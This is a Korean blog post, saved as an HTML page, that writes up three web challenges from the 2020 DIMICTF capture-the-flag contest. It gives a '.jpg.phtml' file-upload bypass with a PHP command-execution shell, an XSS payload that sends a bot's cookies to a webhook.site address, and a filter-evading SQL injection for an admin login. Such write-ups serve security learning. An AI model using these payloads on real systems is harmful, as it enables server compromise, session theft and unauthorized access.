<!DOCTYPE html>
<html lang="en"><head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <style>
        :root {
            --accent-color: #FF4D4D;
        }
    </style>

    
    
    
    
    
    

    
    <title>2020 DIMICTF WEB WRITE UP</title>
    <meta name="description" content="2020 DIMICTF WRITE UP">
    <meta name="keywords" content='blog, gokarna, hugo, CTF'>

    <meta property="og:url" content="https://blog.jhyeon.dev/posts/20200206_dimictf/">
    <meta property="og:type" content="website">
    <meta property="og:title" content="2020 DIMICTF WEB WRITE UP">
    <meta property="og:description" content="2020 DIMICTF WRITE UP">
    <meta property="og:image" content="/images/profile.jpg">

    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:title" content="2020 DIMICTF WEB WRITE UP">
    <meta name="twitter:description" content="2020 DIMICTF WRITE UP">
    <meta property="twitter:domain" content="https://blog.jhyeon.dev/posts/20200206_dimictf/">
    <meta property="twitter:url" content="https://blog.jhyeon.dev/posts/20200206_dimictf/">
    <meta name="twitter:image" content="/images/profile.jpg">

    
    <link rel="canonical" href="https://blog.jhyeon.dev/posts/20200206_dimictf/" />

    <link rel="stylesheet" type="text/css" href="https://blog.jhyeon.dev/css/normalize.min.css" media="print" onload="this.media='all'">
    <link rel="stylesheet" type="text/css" href="https://blog.jhyeon.dev/css/main.css">
    <link disabled id="dark-theme" rel="stylesheet" href="https://blog.jhyeon.dev/css/dark.css">

    <script src="https://blog.jhyeon.dev/js/svg-injector.min.js"></script>
    <script src="https://blog.jhyeon.dev/js/feather-icons.min.js"></script>
    <script src="https://blog.jhyeon.dev/js/main.js"></script>

    
    
        <!-- KaTeX -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.16.0/dist/katex.min.css" integrity="sha384-Xi8rHCmBmhbuyyhbI88391ZKP2dmfnOl4rT9ZfRI7mLTdk1wblIUnrIq35nqwEvC" crossorigin="anonymous">
    <script defer src="https://cdn.jsdelivr.net/npm/katex@0.16.0/dist/katex.min.js" integrity="sha384-X/XCfMm41VSsqRNQgDerQczD69XqmjOOOwYQvr/uuC+j4OPoNhVgjdGFwhvN02Ja" crossorigin="anonymous"></script>
    <script defer src="https://cdn.jsdelivr.net/npm/katex@0.16.0/dist/contrib/auto-render.min.js" integrity="sha384-+XBljXPPiv+OzfbB3cVmLHf4hdUFHlWNZN5spNQ7rmHTXpd7WvJum6fIACpNNfIR" crossorigin="anonymous"></script>
    <script>
      document.addEventListener("DOMContentLoaded", function() {
        renderMathInElement(document.body, {
          // customised options
          // • auto-render specific keys, e.g.:
          delimiters: [
            {left: '$$', right: '$$', display: true},
            {left: '$', right: '$', display: false},
          ],
          // • rendering keys, e.g.:
          throwOnError : false
        });
      });
    </script>
  
    
</head>
<body>
        <script type="text/javascript">
            
            setThemeByUserPref();
        </script><header class="header">
    <nav class="header-nav">

        
        <div class="avatar">
            <a href="https://blog.jhyeon.dev">
                <img src="https://blog.jhyeon.dev/images/profile.jpg" alt="avatar" />
            </a>
        </div>
        

        <div class="nav-title">
            <a class="nav-brand" href="https://blog.jhyeon.dev">DH.J</a>
        </div>

        <div class="nav-links">
            
            <div class="nav-link">
                <a href="https://blog.jhyeon.dev/"><span data-feather='home'></span> Home </a>
            </div>
            
            <div class="nav-link">
                <a href="https://blog.jhyeon.dev/posts/"><span data-feather='book'></span> Posts </a>
            </div>
            
            <div class="nav-link">
                <a href="https://blog.jhyeon.dev/tags/"><span data-feather='tag'></span> Tags </a>
            </div>
            
            <div class="nav-link">
                <a href="https://github.com/dhje0ng"><span data-feather='github'></span>  </a>
            </div>
            
            <div class="nav-link">
                <a href="https://blog.jhyeon.dev/index.xml"><span data-feather='rss'></span>  </a>
            </div>
            

            <span class="nav-icons-divider"></span>
            <div class="nav-link dark-theme-toggle">
                <span id="dark-theme-toggle-screen-reader-target" class="sr-only"></span>
                <a>
                    <span id="theme-toggle-icon" data-feather="moon"></span>
                </a>
            </div>

            <div class="nav-link" id="hamburger-menu-toggle">
                <span id="hamburger-menu-toggle-screen-reader-target" class="sr-only">menu</span>
                <a>
                    <span data-feather="menu"></span>
                </a>
            </div>

            
            <ul class="nav-hamburger-list visibility-hidden">
                
                <li class="nav-item">
                    <a href="https://blog.jhyeon.dev/"><span data-feather='home'></span> Home </a>
                </li>
                
                <li class="nav-item">
                    <a href="https://blog.jhyeon.dev/posts/"><span data-feather='book'></span> Posts </a>
                </li>
                
                <li class="nav-item">
                    <a href="https://blog.jhyeon.dev/tags/"><span data-feather='tag'></span> Tags </a>
                </li>
                
                <li class="nav-item">
                    <a href="https://github.com/dhje0ng"><span data-feather='github'></span>  </a>
                </li>
                
                <li class="nav-item">
                    <a href="https://blog.jhyeon.dev/index.xml"><span data-feather='rss'></span>  </a>
                </li>
                
                <li class="nav-item dark-theme-toggle">
                    <span id="dark-theme-toggle-screen-reader-target" class="sr-only">theme</span>
                    <a>
                        <span id="theme-toggle-icon" data-feather="moon"></span>
                    </a>
                </li>
            </ul>

        </div>
    </nav>
</header>
<main id="content">
    <div class="post container">
    <div class="post-header-section">
        <h1>2020 DIMICTF WEB WRITE UP</h1>
        <small role="doc-subtitle">2020 DIMICTF WRITE UP</small>
        <p class="post-date">
            February 6, 2020
        </p>

        <ul class="post-tags">
        
            <li class="post-tag"><a href="https://blog.jhyeon.dev/tags/ctf">CTF</a></li>
        
        </ul>
    </div>

    <div class="post-content">
        <p>
            <h1 id="web">WEB</h1>
<h2 id="5shared">5shared</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#f92672">&lt;?</span><span style="color:#a6e22e">php</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">require_once</span> <span style="color:#e6db74">&#39;lib.php&#39;</span>;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">session_start</span>();
</span></span><span style="display:flex;"><span>$session <span style="color:#f92672">=</span> <span style="color:#a6e22e">md5</span>(<span style="color:#a6e22e">session_id</span>());
</span></span><span style="display:flex;"><span>$uploaddir <span style="color:#f92672">=</span> <span style="color:#66d9ef">__DIR__</span> <span style="color:#f92672">.</span> <span style="color:#e6db74">&#34;/~uploads/</span><span style="color:#e6db74">{</span>$session<span style="color:#e6db74">}</span><span style="color:#e6db74">/&#34;</span>;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">createDirectory</span>(<span style="color:#66d9ef">__DIR__</span> <span style="color:#f92672">.</span> <span style="color:#e6db74">&#34;/~uploads/&#34;</span>);
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">createDirectory</span>($uploaddir);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">//print_r($_FILES[&#39;file&#39;]);
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>$file <span style="color:#f92672">=</span> $_FILES[<span style="color:#e6db74">&#39;file&#39;</span>];
</span></span><span style="display:flex;"><span>$uploadfile <span style="color:#f92672">=</span> $uploaddir <span style="color:#f92672">.</span> $file[<span style="color:#e6db74">&#39;name&#39;</span>];
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">// sanity check
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>$extension <span style="color:#f92672">=</span> <span style="color:#a6e22e">explode</span>(<span style="color:#e6db74">&#39;.&#39;</span>, $file[<span style="color:#e6db74">&#39;name&#39;</span>])[<span style="color:#ae81ff">1</span>];
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span><span style="color:#a6e22e">in_array</span>($extension, <span style="color:#66d9ef">Array</span>(<span style="color:#e6db74">&#34;jpg&#34;</span>, <span style="color:#e6db74">&#34;gif&#34;</span>, <span style="color:#e6db74">&#34;png&#34;</span>)))
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    $message <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&lt;script&gt;alert(&#39;jpg, gif, png 확장자만 업로드할 수 있습니다.&#39;); history.back(); &lt;/script&gt;&#34;</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">die</span>($message);
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">// the real sanity check
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>$real_extension <span style="color:#f92672">=</span> <span style="color:#a6e22e">array_pop</span>(<span style="color:#a6e22e">explode</span>(<span style="color:#e6db74">&#39;.&#39;</span>, $file[<span style="color:#e6db74">&#39;name&#39;</span>]));
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">preg_match</span>(<span style="color:#e6db74">&#34;/php/i&#34;</span>, $file[<span style="color:#e6db74">&#39;name&#39;</span>]))
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    $message <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&lt;script&gt;alert(&#39;파일 이름에 php가 들어가면 안됩니다.&#39;); history.back(); &lt;/script&gt;&#34;</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">die</span>($message);
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> ($file[<span style="color:#e6db74">&#39;size&#39;</span>] <span style="color:#f92672">&gt;</span> <span style="color:#ae81ff">4096</span>)
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    $message <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&lt;script&gt;alert(&#39;최대 4mb까지 업로드할 수 있습니다.&#39;); history.back(); &lt;/script&gt;&#34;</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">die</span>($message);
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">move_uploaded_file</span>($file[<span style="color:#e6db74">&#39;tmp_name&#39;</span>], $uploadfile))
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    $message <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&lt;script&gt;alert(&#39;성공적으로 파일이 업로드되었습니다.&#39;); location.href = &#39;/&#39;; &lt;/script&gt;&#34;</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">echo</span> $message;
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">else</span>
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    $message <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&lt;script&gt;alert(&#39;업로드 에러&#39;); history.back(); &lt;/script&gt;&#34;</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">echo</span> $message;
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#75715e">// sanity check
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>$extension <span style="color:#f92672">=</span> <span style="color:#a6e22e">explode</span>(<span style="color:#e6db74">&#39;.&#39;</span>, $file[<span style="color:#e6db74">&#39;name&#39;</span>])[<span style="color:#ae81ff">1</span>];
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> (<span style="color:#f92672">!</span><span style="color:#a6e22e">in_array</span>($extension, <span style="color:#66d9ef">Array</span>(<span style="color:#e6db74">&#34;jpg&#34;</span>, <span style="color:#e6db74">&#34;gif&#34;</span>, <span style="color:#e6db74">&#34;png&#34;</span>)))
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    $message <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&lt;script&gt;alert(&#39;jpg, gif, png 확장자만 업로드할 수 있습니다.&#39;); history.back(); &lt;/script&gt;&#34;</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">die</span>($message);
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">// the real sanity check
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>$real_extension <span style="color:#f92672">=</span> <span style="color:#a6e22e">array_pop</span>(<span style="color:#a6e22e">explode</span>(<span style="color:#e6db74">&#39;.&#39;</span>, $file[<span style="color:#e6db74">&#39;name&#39;</span>]));
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">preg_match</span>(<span style="color:#e6db74">&#34;/php/i&#34;</span>, $file[<span style="color:#e6db74">&#39;name&#39;</span>]))
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    $message <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&lt;script&gt;alert(&#39;파일 이름에 php가 들어가면 안됩니다.&#39;); history.back(); &lt;/script&gt;&#34;</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">die</span>($message);
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>PHP 파일 업로드 취약점이 눈에 보이는 문제이다.</p>
<p>sanity check 소스코드를 보면 파일명과 확장자를 분리해서 확장자에 jpg, gif, png가 있는지 검사하는 로직이 있다.</p>
<p>그러나 이 검증 로직은 <code>&lt;filename&gt;.jpg</code> 즉 처음으로 오는 확장자에 대해서만 유효성 검사를 하지 <code>.jpg.php</code> 이런식으로</p>
<p>오면 재대로 검증을 하지 않고 pass가 된다. 따라서 방금 설명한 방식으로 우회를 할 수 있지만 추가로 <code>php</code> 문자가 포함</p>
<p>되어 있는지 검증을 하고 있기 때문에 <code>pht, phtml</code> 이런 확장자로 우회해서 php 코드를 실행시킬 수 있다.</p>
<h3 id="exploit">Exploit</h3>
<p>filename=<code>upload.jpg.phtml</code></p>
<p>content=<code>&lt;?php system('ls');?&gt;</code></p>
<hr>
<h2 id="simple-xss">simple xss</h2>
<p>문제에 들어가면 게시판이 하나 있다. 해당 게시판에서 글쓰기 기능이 구현되어 있고</p>
<p>내용에다 XSS 테스트 페이로드(<code>alert(1)</code>) 넣었더니 동작했었다. 그래서 봇이 플래그 쿠키를 가지고 있고</p>
<p>해당 봇이 내 게시글을 방문할 때 XSS 트리거를 시켜서 내 서버로 들어오게 끔 Redirection 시켜주면</p>
<p>봇이 가진 쿠키값을 내 서버에서 읽을 수 있기 때문에 이런식으로 문제를 풀면 된다.</p>
<h3 id="exploit-1">Exploit</h3>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-javascript" data-lang="javascript"><span style="display:flex;"><span><span style="color:#f92672">&lt;</span><span style="color:#a6e22e">script</span><span style="color:#f92672">&gt;</span><span style="color:#a6e22e">location</span>.<span style="color:#a6e22e">href</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#39;https://webhook.site/&#39;</span><span style="color:#f92672">+</span>document.<span style="color:#a6e22e">cookie</span>;<span style="color:#f92672">&lt;</span><span style="color:#960050;background-color:#1e0010">/script&gt;</span>
</span></span></code></pre></div><hr>
<h2 id="simple-sqli">simple sqli</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-php" data-lang="php"><span style="display:flex;"><span><span style="color:#f92672">&lt;?</span><span style="color:#a6e22e">php</span> 
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">//error_reporting(E_ALL); 
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">//ini_set(&#34;display_errors&#34;, 1); 
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">require</span> <span style="color:#e6db74">&#39;lib.php&#39;</span>; 
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">isset</span>($_GET[<span style="color:#e6db74">&#39;view-source&#39;</span>])){ 
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">highlight_file</span>(<span style="color:#66d9ef">__FILE__</span>); 
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">exit</span>; 
</span></span><span style="display:flex;"><span>} 
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>$id <span style="color:#f92672">=</span> $_POST[<span style="color:#e6db74">&#39;id&#39;</span>]; 
</span></span><span style="display:flex;"><span>$pw <span style="color:#f92672">=</span> $_POST[<span style="color:#e6db74">&#39;pw&#39;</span>]; 
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">//var_dump($conn); 
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">preg_match</span>(<span style="color:#e6db74">&#34;/information|admin|or|\=| |\#|\&#39;|_|where/i&#34;</span>, $id <span style="color:#f92672">.</span> $pw)) 
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">die</span>(<span style="color:#e6db74">&#34;No Hack ~_~&#34;</span>); 
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> (<span style="color:#a6e22e">isset</span>($id, $pw)) { 
</span></span><span style="display:flex;"><span>    $query <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;SELECT * FROM `users` WHERE `id` = trim(&#39;</span><span style="color:#e6db74">{</span>$id<span style="color:#e6db74">}</span><span style="color:#e6db74">&#39;) AND `pw` = trim(&#39;</span><span style="color:#e6db74">{</span>$pw<span style="color:#e6db74">}</span><span style="color:#e6db74">&#39;)&#34;</span>; 
</span></span><span style="display:flex;"><span>    $result <span style="color:#f92672">=</span> <span style="color:#a6e22e">mysqli_fetch_array</span>(<span style="color:#a6e22e">mysqli_query</span>($conn, $query)); 
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> ($result[<span style="color:#e6db74">&#39;id&#39;</span>] <span style="color:#f92672">===</span> <span style="color:#e6db74">&#39;admin&#39;</span>) 
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">echo</span> <span style="color:#e6db74">&#34;&lt;h1&gt;</span><span style="color:#e6db74">{</span>$flag<span style="color:#e6db74">}</span><span style="color:#e6db74">&lt;/h1&gt;&#34;</span>; 
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> ($result[<span style="color:#e6db74">&#39;id&#39;</span>]) { 
</span></span><span style="display:flex;"><span>        $message <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;</span><span style="color:#e6db74">{</span>$result[<span style="color:#e6db74">&#39;id&#39;</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">님 안녕하세요!&#34;</span>; 
</span></span><span style="display:flex;"><span>    } <span style="color:#66d9ef">else</span> { 
</span></span><span style="display:flex;"><span>        $message <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;로그인에 실패하였습니다. 다시 시도해주세요.&#34;</span>; 
</span></span><span style="display:flex;"><span>    } 
</span></span><span style="display:flex;"><span>} 
</span></span><span style="display:flex;"><span><span style="color:#75715e">?&gt;</span><span style="color:#960050;background-color:#1e0010">
</span></span></span></code></pre></div><p>문제 페이지에 들어가면 다음과 같이 로그인 구현체에 대한 소스코드를 볼 수 있다.</p>
<p>SQL Injection 공격을 못하도록 <code>preg_match</code> 정규식 함수로 필터링을 하는 로직을 볼 수 있다.</p>
<p>그러나 white space 같은 경우 tab 문자로 우회할 수 있고 <code>=</code> 문자는 like 로 우회할 수 있다.</p>
<p>그리고 아이디 부분에 (backslash) 를 넣어주면 Injection 공격이 가능하다.</p>
<h3 id="exploit-2">Exploit</h3>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-plaintext" data-lang="plaintext"><span style="display:flex;"><span>id=\&amp;pw=)|| id like &#34;ad&#34; &#34;min&#34;-- -
</span></span></code></pre></div>
        </p>
    </div>

    <script src="https://utteranc.es/client.js"
    repo="dhje0ng/dhje0ng.github.io"
    issue-term="title"
    label="Comment"
    theme="github-dark"
    crossorigin="anonymous"
    async>
    </script>

</div>

<aside class="post-toc">
    <nav id="toc">
        <nav id="TableOfContents">
  <ul>
    <li><a href="#web">WEB</a>
      <ul>
        <li><a href="#5shared">5shared</a>
          <ul>
            <li><a href="#exploit">Exploit</a></li>
          </ul>
        </li>
        <li><a href="#simple-xss">simple xss</a>
          <ul>
            <li><a href="#exploit-1">Exploit</a></li>
          </ul>
        </li>
        <li><a href="#simple-sqli">simple sqli</a>
          <ul>
            <li><a href="#exploit-2">Exploit</a></li>
          </ul>
        </li>
      </ul>
    </li>
  </ul>
</nav>
    </nav>
</aside>



    

        </main><footer class="footer">
    <span>&copy; 2022 DH.J</span>
    <span>
        Made with &#10084;&#65039; using <a target="_blank" href="https://github.com/526avijitgupta/gokarna">Gokarna</a>
    </span>
</footer>
</body>
</html>
